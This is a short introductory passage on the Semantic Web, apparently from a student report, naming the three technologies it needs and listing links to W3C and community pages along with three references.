Towards achieving the attainment of the Semantic Web, the development of three major technologies is needed. These are: a language that allows users to add structure into their documents easily and in a uniform way, a framework that would add meaning to the evolved structure and an entity that would solve the problem of communication. Each of these technologies will be presented and discussed in future sections.

Useful links:
http://www.w3.org/2001/sw/ (W3C’s page, the power behind the Semantic Web)
http://www.semanticweb.org/ (Community for the Semantic Web)
http://rdfweb.org/ (Example of a Semantic Web application)
http://www.w3.org/DesignIssues/Semantic (Roadmap to the future for the Semantic Web)
http://ftrain.com/google_takes_all.html (Why Google marketplace became so successful?)
http://www.netcrucible.com/semantic.html (How can you make a semantic web site?)

References

• W3C Semantic Web Homepage, http://www.w3.org/2001/sw/ (21 November 2002).
• Goble, C. 2003. The Semantic Web: an evolution for a revolution. In: Computer Networks, Volume 42, Issue 5, pp. 551-556.
• Berners-Lee, T.; Hendler, J. and Lasilla, O. 2001. The Semantic Web. Ed. Scientific American, Vol. 284, Issue 5, New York.